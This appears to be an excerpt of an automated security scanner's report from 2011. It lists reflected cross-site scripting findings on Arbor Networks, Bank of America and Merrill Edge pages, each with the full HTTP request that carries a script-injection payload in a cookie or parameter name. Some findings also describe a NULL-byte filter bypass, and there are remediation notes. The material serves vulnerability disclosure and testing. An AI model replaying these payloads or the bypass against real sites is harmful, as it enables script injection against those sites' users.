Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy_policy.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enac374"><script>alert(1)</script>5a50e0c21ab; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9071"><script>alert(1)</script>e4e30e085f was submitted in the mbfcookie[lang] cookie. This input was echoed as a9071\"><script>alert(1)</script>e4e30e085f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena9071"><script>alert(1)</script>e4e30e085f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54038"><script>alert(1)</script>1e95dab8e0e was submitted in the mbfcookie[lang] cookie. This input was echoed as 54038\"><script>alert(1)</script>1e95dab8e0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/lost-password-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en54038"><script>alert(1)</script>1e95dab8e0e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb1d"><script>alert(1)</script>cfcda14f30a was submitted in the mbfcookie[lang] cookie. This input was echoed as deb1d\"><script>alert(1)</script>cfcda14f30a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/partner-portal-home.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=endeb1d"><script>alert(1)</script>cfcda14f30a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b457f"><script>alert(1)</script>667bdae159f was submitted in the mbfcookie[lang] cookie. This input was echoed as b457f\"><script>alert(1)</script>667bdae159f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?option=com_content&task=view&id=296&Itemid=297 HTTP/1.1 Host: www.arbornetworks.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; mbfcookie[lang]=enb457f"><script>alert(1)</script>667bdae159f; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.2.10.1296689848
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8239"><script>alert(1)</script>31f3540dcc0 was submitted in the mbfcookie[lang] cookie. This input was echoed as d8239\"><script>alert(1)</script>31f3540dcc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=end8239"><script>alert(1)</script>31f3540dcc0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bddb"><script>alert(1)</script>119487711af was submitted in the mbfcookie[lang] cookie. This input was echoed as 1bddb\"><script>alert(1)</script>119487711af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /register.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en1bddb"><script>alert(1)</script>119487711af; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0853'%3balert(1)//b444241d7da was submitted in the BOA_0020 cookie. This input was echoed as b0853';alert(1)//b444241d7da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/Control.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853'%3balert(1)//b444241d7da; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:17 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=00004QCD_ZjewAQatQwb0kn5dXN:12qb4kb6q; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:16 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]... <!--
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fed0'%3balert(1)//f83f2273ab8 was submitted in the BOA_0020 cookie. This input was echoed as 3fed0';alert(1)//f83f2273ab8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0'%3balert(1)//f83f2273ab8; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:15 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000CnfCKRIifEAopeDjObSoiF3:12qb4k93q; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:14 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]... <!--
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0296'%3balert(1)//224de741dab was submitted in the BOA_0020 cookie. This input was echoed as a0296';alert(1)//224de741dab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296'%3balert(1)//224de741dab; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:39 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000iSQjObSnt8ukh_g0-dQwNmC:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:38 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descript ...[SNIP]... <!--
2.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.merrilledge.com
Path:
/m/pages/merrill-edge-advisory-center.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9e1d"><script>alert(1)</script>a47d51819dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9e1d"><script>alert(1)</script>a47d51819dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?%00f9e1d"><script>alert(1)</script>a47d51819dc=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0095641'%3b9ef12e8200f was submitted in the src_cd parameter. This input was echoed as 95641';9ef12e8200f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c13e'-alert(1)-'c4f9da1816c was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /IRA/pages/home.aspx HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c; SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxv=4B1B9E90-7DD2-4095-A535-9FE88031C408; CMAVID=none; cmTPSet=Y; BrowserCheckDone=true;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:45:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 36286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <![CDATA[ lpAddVars('page','section','Home'); lpAddVars('page','ConversionStage','Home'); lpAddVars('page','Session ID','689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c'); var cookieExists=false;Sys.Application.initialize(); Sys.Application.add_init(function() { $create(MerrillLynch.Application.ECMS.WebUI.ECMSContentCtrl, {"Application":"IRA","ContentLocations ...[SNIP]...